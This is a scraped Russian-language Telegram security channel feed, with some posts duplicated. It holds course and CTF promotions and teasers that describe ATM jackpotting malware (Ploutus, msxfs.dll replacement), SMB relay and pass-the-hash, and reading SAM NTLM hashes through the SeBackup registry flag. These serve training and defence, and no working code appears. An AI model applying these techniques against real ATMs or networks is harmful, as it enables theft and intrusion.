После атак злоумышленники чистят логи, маскируют ВПО и заметают следы. Большинство видит пустоту.
Только настоящий профессионал восстанавливает картину целиком.
Курс по реагированию на компьютерные инциденты — та самая база для будущих экспертов в BlueTeam и IRT.
Курс РКИ — это не теория. Это практический курс, после которого вы будете:
Что в программе
Стартуем 8 июня
Узнать подробнее о курсе
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7❤3🔥3
Почему банкомат выдаёт деньги без карты — и как это ловить
В 2024–2025 годах по США прокатилась волна jackpotting-атак: преступники опустошали кассеты банкоматов без единой карты и без стандартной транзакции. FBI и Secret Service выпускали экстренные предупреждения, аресты шли сразу в нескольких штатах. Восстановление одного заражённого банкомата обходится свыше $25 000 — форензика, переустановка ОС, сертификация, простой. Умножьте на десятки машин — и масштаб проблемы станет очевидным.
🔩 Всё начинается с физики. Банкомат делится на бронированный сейф внизу и так называемый «top hat» — верхнюю панель с системным блоком, USB-портами и сетевыми интерфейсами. Замки этих панелей серийные — один ключ на целую партию устройств. Атакующий в форме техника открывает корпус за 2–5 минут, вставляет USB-флешку — и дальше работает малварь.
Самые известные семейства — Ploutus и Tyupkin. Оба бьют в одну архитектурную слабость: стандарт XFS (Extensions for Financial Services), через который банковское ПО управляет диспенсером, кардридером и пинпадом. XFS-команды на уровне middleware не требуют аутентификации конечного пользователя. Получив возможность выполнить код на ОС банкомата, атакующий отправляет
Ploutus подменяет библиотеку
Есть и второй метод — black-box. Тут ОС вообще не трогают: штатный системный блок отключают от диспенсера, подключают одноплатник или ноутбук напрямую к шине и шлют команды выдачи, имитируя контроллер.
⚡ Что может сделать SOC? Три конкретных шага:
• Тамперный датчик на вскрытие корпуса должен генерировать P1-алерт в SIEM с автоматическим блокированием сетевого порта через NAC. Без этой связки между физическим и логическим мониторингом — слепая зона размером с весь ATM-парк.
• Application whitelisting на каждом банкомате. Если бинарь не в белом списке — он не запустится. Kaspersky Embedded Systems Security или Trellix Application Control при корректной настройке закрывают малварный вектор.
• Шифрование XFS-канала между middleware и диспенсером. Последние поколения NCR это поддерживают — без валидных ключей black-box становится бесполезен.
🔍 Отдельный риск — инсайдер. Скомпрометированный сотрудник подрядчика ставит малварь при плановом визите. Легитимный доступ, легитимные инструменты — тут спасает только dual-control и жёсткий контроль на уровне СКУД.
Тема глубже, чем кажется: shimming POS-терминалов, detection-правила под MITRE ATT&CK, конкретные маппинги техник — всё это разобрано в полной статье на форуме.
https://codeby.net/threads/pentest-bankomatov-i-pos-terminalov-jackpotting-shimming-i-detection-dlya-soc.93681/
В 2024–2025 годах по США прокатилась волна jackpotting-атак: преступники опустошали кассеты банкоматов без единой карты и без стандартной транзакции. FBI и Secret Service выпускали экстренные предупреждения, аресты шли сразу в нескольких штатах. Восстановление одного заражённого банкомата обходится свыше $25 000 — форензика, переустановка ОС, сертификация, простой. Умножьте на десятки машин — и масштаб проблемы станет очевидным.
🔩 Всё начинается с физики. Банкомат делится на бронированный сейф внизу и так называемый «top hat» — верхнюю панель с системным блоком, USB-портами и сетевыми интерфейсами. Замки этих панелей серийные — один ключ на целую партию устройств. Атакующий в форме техника открывает корпус за 2–5 минут, вставляет USB-флешку — и дальше работает малварь.
Самые известные семейства — Ploutus и Tyupkin. Оба бьют в одну архитектурную слабость: стандарт XFS (Extensions for Financial Services), через который банковское ПО управляет диспенсером, кардридером и пинпадом. XFS-команды на уровне middleware не требуют аутентификации конечного пользователя. Получив возможность выполнить код на ОС банкомата, атакующий отправляет
WFSExecute напрямую к диспенсеру — минуя бэкенд и процессинг. Для банка эта операция просто не существует.Ploutus подменяет библиотеку
msxfs.dll, прописывается в автозагрузку через ключ реестра Userinit и активируется по mule-кодам с внешней USB-клавиатуры. Скрытый интерфейс показывает содержимое кассет, скорость выдачи — свыше 100 купюр в минуту. Банкомат можно опустошить менее чем за 10 минут.Есть и второй метод — black-box. Тут ОС вообще не трогают: штатный системный блок отключают от диспенсера, подключают одноплатник или ноутбук напрямую к шине и шлют команды выдачи, имитируя контроллер.
⚡ Что может сделать SOC? Три конкретных шага:
• Тамперный датчик на вскрытие корпуса должен генерировать P1-алерт в SIEM с автоматическим блокированием сетевого порта через NAC. Без этой связки между физическим и логическим мониторингом — слепая зона размером с весь ATM-парк.
• Application whitelisting на каждом банкомате. Если бинарь не в белом списке — он не запустится. Kaspersky Embedded Systems Security или Trellix Application Control при корректной настройке закрывают малварный вектор.
• Шифрование XFS-канала между middleware и диспенсером. Последние поколения NCR это поддерживают — без валидных ключей black-box становится бесполезен.
🔍 Отдельный риск — инсайдер. Скомпрометированный сотрудник подрядчика ставит малварь при плановом визите. Легитимный доступ, легитимные инструменты — тут спасает только dual-control и жёсткий контроль на уровне СКУД.
Тема глубже, чем кажется: shimming POS-терминалов, detection-правила под MITRE ATT&CK, конкретные маппинги техник — всё это разобрано в полной статье на форуме.
https://codeby.net/threads/pentest-bankomatov-i-pos-terminalov-jackpotting-shimming-i-detection-dlya-soc.93681/
👍10❤6🔥5👎1
Forwarded from Блог Сергея Попова
🎯 Карьерный навигатор в кибербезопасности 2026
Пять треков, реальные зарплаты, конкретные точки входа — без воды и мотивационных речей.
Каждую неделю в личку форума прилетает одно и то же: «С чего начать в инфобезе?» или «Год в SOC L1 — куда дальше?». Вместо того чтобы отвечать в личку 50 раз — собрали всё в одном треде.
🔬 Пять треков, между которыми нужно выбирать:
• Pentester / Offensive Security — от 100K junior до 400K+ senior • SOC Analyst — от 90K на L1 до 450K руководитель SOC • DFIR — от 140K trainee до 600K forensic lead • AppSec / Secure Development — от 150K до 800K в финтехе • Red Team — входной билет от 200K, потолок 700K+
Цифры — медиана по Москве на 2026, данные hh.ru, SuperJob, Habr Career.
⚙️ Для каждого трека внутри: необходимые навыки, инструменты, сертификации, точка входа и ссылки на профильные гайды форума.
Отдельный блок — для тех, кто уже junior и упёрся в потолок: три конкретных действия за год, которые меняют финальный оффер на 30–50%.
💬 В конце — открытый опрос и живое обсуждение. Пишите, на каком вы этапе и что мешает следующему шагу — отвечаем лично каждому.
👉 https://codeby.net/threads/misen-kar-yernyi-navigator-v-kiberbezopasnosti-2026-treki-zarplaty-tochki-vkhoda.93738/
Пять треков, реальные зарплаты, конкретные точки входа — без воды и мотивационных речей.
Каждую неделю в личку форума прилетает одно и то же: «С чего начать в инфобезе?» или «Год в SOC L1 — куда дальше?». Вместо того чтобы отвечать в личку 50 раз — собрали всё в одном треде.
🔬 Пять треков, между которыми нужно выбирать:
• Pentester / Offensive Security — от 100K junior до 400K+ senior • SOC Analyst — от 90K на L1 до 450K руководитель SOC • DFIR — от 140K trainee до 600K forensic lead • AppSec / Secure Development — от 150K до 800K в финтехе • Red Team — входной билет от 200K, потолок 700K+
Цифры — медиана по Москве на 2026, данные hh.ru, SuperJob, Habr Career.
⚙️ Для каждого трека внутри: необходимые навыки, инструменты, сертификации, точка входа и ссылки на профильные гайды форума.
Отдельный блок — для тех, кто уже junior и упёрся в потолок: три конкретных действия за год, которые меняют финальный оффер на 30–50%.
💬 В конце — открытый опрос и живое обсуждение. Пишите, на каком вы этапе и что мешает следующему шагу — отвечаем лично каждому.
👉 https://codeby.net/threads/misen-kar-yernyi-navigator-v-kiberbezopasnosti-2026-treki-zarplaty-tochki-vkhoda.93738/
❤9👍4🔥3👎2😁1
38 минут от первого запроса до пароля domain-админа: почему сетевые протоколы — самое слабое звено
Внутренний пентест логистической компании. Nmap показал порт 161/udp с дефолтной community string, и SNMP-сервис радостно выдал имена хостов, интерфейсы и запущенные процессы. Два перехода по SMB-шарам с анонимным доступом, файл
Это не редкость, а типичная картина. Протоколы вроде SMB, FTP, SNMP и SMTP существуют десятилетиями, и именно поэтому их конфигурации часто остаются «как было при установке». Админы фокусируются на WAF и EDR, а дефолтный
🔎 SNMP — часто самый недооценённый вектор. Community string — по сути пароль для доступа к информации об устройстве. На огромном количестве оборудования стоит
SMB — классика внутреннего пентеста. Два ключевых момента:
⏺️ Анонимный доступ к шарам — файлы с паролями, конфиги, бэкапы баз лежат в открытом виде чаще, чем хочется верить
⏺️ SMB signing отключён на рабочих станциях — до Windows 11 24H2 подпись пакетов включена, но не обязательна. Это открывает дверь для SMB relay: перехватил запрос аутентификации, перенаправил на другой хост, получил доступ
Отдельная история — NTLM-хеши. Windows хранит не пароль, а его хеш. Зная хеш, можно аутентифицироваться без самого пароля (Pass-the-Hash). Расшифровывать ничего не нужно.
✉️ SMTP тоже не отстаёт. Open relay — почтовый сервер, который пересылает письма от кого угодно кому угодно. Фишинговое письмо с настоящего IP компании проходит базовые проверки на ура.
Что объединяет все эти сервисы? Проблема не в протоколах, а в конфигурации. Каждый из них можно настроить безопасно — но этого часто не делают.
🎇 В полной версии статьи — пошаговая разведка через Nmap, конкретные команды для эксплуатации каждого протокола, инструкция по развёртыванию лаборатории на Metasploitable 2 и детальный разбор техник. Читайте и практикуйте в безопасной среде.
https://codeby.net/threads/ataki-na-setevyye-protokoly-pri-penteste-ekspluatatsiya-smb-ftp-snmp-i-smtp.93694/
Внутренний пентест логистической компании. Nmap показал порт 161/udp с дефолтной community string, и SNMP-сервис радостно выдал имена хостов, интерфейсы и запущенные процессы. Два перехода по SMB-шарам с анонимным доступом, файл
passwords.xlsx в открытом виде — домен скомпрометирован. Три сервиса, ни один не настроили. Сложных эксплойтов не понадобилось.Это не редкость, а типичная картина. Протоколы вроде SMB, FTP, SNMP и SMTP существуют десятилетиями, и именно поэтому их конфигурации часто остаются «как было при установке». Админы фокусируются на WAF и EDR, а дефолтный
public на SNMP живёт годами.public для чтения и private для записи. Одна команда — и вы читаете конфигурацию маршрутизаторов, коммутаторов, серверов. Имена хостов, сетевые интерфейсы, список процессов — всё это отличная стартовая точка для дальнейшего продвижения по сети.SMB — классика внутреннего пентеста. Два ключевых момента:
Отдельная история — NTLM-хеши. Windows хранит не пароль, а его хеш. Зная хеш, можно аутентифицироваться без самого пароля (Pass-the-Hash). Расшифровывать ничего не нужно.
Что объединяет все эти сервисы? Проблема не в протоколах, а в конфигурации. Каждый из них можно настроить безопасно — но этого часто не делают.
https://codeby.net/threads/ataki-na-setevyye-protokoly-pri-penteste-ekspluatatsiya-smb-ftp-snmp-i-smtp.93694/
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7❤5🔥4
🔍 Сетевая разведка за 30 дней — 4 недели практики на HackerLab
80% реальных пентест-engagement'ов начинаются с nmap и gobuster, а не с экзотических эксплойтов. Кто умеет читать вывод сканера — находит уязвимости. Кто пропускает recon — стоит на брутфорсе вечно.
С 1 по 28 июня — бесплатная серия из 4 задач на hackerlab.pro. Одна неделя = один инструмент, сложность растёт:
📌 Неделя 1 — nmap: port scan + banner grabbing
📌 Неделя 2 — nmap -sV, ssh-audit: service enumeration
📌 Неделя 3 — gobuster, ffuf, wfuzz: web recon, directory + vhost
📌 Неделя 4 — nmap + Burp + hydra: полная цепочка recon → exploitation
Всё решается прямо на платформе — никаких VPN, регистраций, скачиваний.
⚙️ Каждый понедельник — новый weekly-тред с intro, ссылками и discussion prompts. До дедлайна обсуждаем подходы и ошибки без спойлеров, после — открываем writeup'ы.
🎁 Топ-3 первых solver'ов каждой недели — мерч от Codeby + упоминание в рекапе. Лучшие writeup'ы закрепляются в треде.
Подходит всем уровням: от первого запуска nmap до «code review» recon-привычек для middle.
К концу июня — свой чеклист «что делать, когда увидел новый IP» и публичные writeup'ы в портфолио.
📅 Старт — 1 июня. Первая машина — «Кто там?»
👉 https://codeby.net/threads/misen-setevaya-razvedka-za-30-dnei-4-nedeli-praktiki-na-hackerlab.93740/
80% реальных пентест-engagement'ов начинаются с nmap и gobuster, а не с экзотических эксплойтов. Кто умеет читать вывод сканера — находит уязвимости. Кто пропускает recon — стоит на брутфорсе вечно.
С 1 по 28 июня — бесплатная серия из 4 задач на hackerlab.pro. Одна неделя = один инструмент, сложность растёт:
📌 Неделя 1 — nmap: port scan + banner grabbing
📌 Неделя 2 — nmap -sV, ssh-audit: service enumeration
📌 Неделя 3 — gobuster, ffuf, wfuzz: web recon, directory + vhost
📌 Неделя 4 — nmap + Burp + hydra: полная цепочка recon → exploitation
Всё решается прямо на платформе — никаких VPN, регистраций, скачиваний.
⚙️ Каждый понедельник — новый weekly-тред с intro, ссылками и discussion prompts. До дедлайна обсуждаем подходы и ошибки без спойлеров, после — открываем writeup'ы.
🎁 Топ-3 первых solver'ов каждой недели — мерч от Codeby + упоминание в рекапе. Лучшие writeup'ы закрепляются в треде.
Подходит всем уровням: от первого запуска nmap до «code review» recon-привычек для middle.
К концу июня — свой чеклист «что делать, когда увидел новый IP» и публичные writeup'ы в портфолио.
📅 Старт — 1 июня. Первая машина — «Кто там?»
👉 https://codeby.net/threads/misen-setevaya-razvedka-za-30-dnei-4-nedeli-praktiki-na-hackerlab.93740/
🔥8❤3👍3👎2
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5❤4🔥3
При ARP Spoofing
злоумышленник отправляет поддельные ARP-какой из вариантов наиболее точно описывает ARP
Spoofing❓
злоумышленник отправляет поддельные ARP-какой из вариантов наиболее точно описывает ARP
Spoofing
Anonymous Quiz
8%
Массовая отправка ICMP-пакетов для отказа в обслуживании
2%
Сканирование открытых портов в сети
83%
Подмена ARP-ответов для перехвата трафика в локальной сети
7%
Подмена DNS-записей для перенаправления трафика
👀11👍7❤3🌚3🫡3🔥2😁1🤔1
Forwarded from Hacker Lab
🚩 Новые задания на платформе HackerLab!
🎢 Категория Разное — Анонимизатор
——————————————
🗂 В архив добавлены задания + райтапы:
🔵 PWN - Piece of cake
Приятного хакинга!
——————————————
🗂 В архив добавлены задания + райтапы:
Приятного хакинга!
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7🔥5👍3👎2🍌1
🔑 Анатомия реестра Windows: SAM, BootKey и извлечение NTLM-хэшей
«Для доступа к SAM нужны права SYSTEM, а хэши — только через дамп lsass». Все это повторяют, но это не совсем так.
Заключительная часть серии по внутренним особенностям реестра. На этот раз — практический разбор того, как Mimikatz, Hashcat и PassRecovery вытаскивают пароли из учётных записей Windows.
Что внутри:
📌 Как устроена база SAM — аутентификация, SID, политики безопасности и связь с lsass.exe
📌 BootKey — сборка 16-байтного ключа шифрования из скрытых полей ClassName четырёх ключей LSA (JD, Skew1, Data, GBG)
📌 Недокументированные структуры параметров F (fixed) и V (variable) — где лежат хэши NTLM, имена учёток, даты входа и счётчики
📌 Почему Credential Guard и RunAsPPL блокируют дамп lsass, но не закрывают доступ через реестр
⚙️ Практика — рабочий код на FASM, который из пользовательской сессии с привилегией SeBackup читает ветку SAM через
Флаг не наследуется, документации на структуры нет с времён WinXP, а различия между Win7 и Win10+ ломают все старые парсеры. Автор нашёл актуальные структуры и показывает всё на живой системе.
👉 https://codeby.net/threads/anatomiya-reyestra-windows-3-vynosim-kh-eshi-iz-sam.93782/
«Для доступа к SAM нужны права SYSTEM, а хэши — только через дамп lsass». Все это повторяют, но это не совсем так.
Заключительная часть серии по внутренним особенностям реестра. На этот раз — практический разбор того, как Mimikatz, Hashcat и PassRecovery вытаскивают пароли из учётных записей Windows.
Что внутри:
📌 Как устроена база SAM — аутентификация, SID, политики безопасности и связь с lsass.exe
📌 BootKey — сборка 16-байтного ключа шифрования из скрытых полей ClassName четырёх ключей LSA (JD, Skew1, Data, GBG)
📌 Недокументированные структуры параметров F (fixed) и V (variable) — где лежат хэши NTLM, имена учёток, даты входа и счётчики
📌 Почему Credential Guard и RunAsPPL блокируют дамп lsass, но не закрывают доступ через реестр
⚙️ Практика — рабочий код на FASM, который из пользовательской сессии с привилегией SeBackup читает ветку SAM через
RegCreateKeyEx + REG_OPTION_BACKUP_RESTORE. Без дампов памяти, без обращения к lsass.Флаг не наследуется, документации на структуры нет с времён WinXP, а различия между Win7 и Win10+ ломают все старые парсеры. Автор нашёл актуальные структуры и показывает всё на живой системе.
👉 https://codeby.net/threads/anatomiya-reyestra-windows-3-vynosim-kh-eshi-iz-sam.93782/
❤10👍7🔥2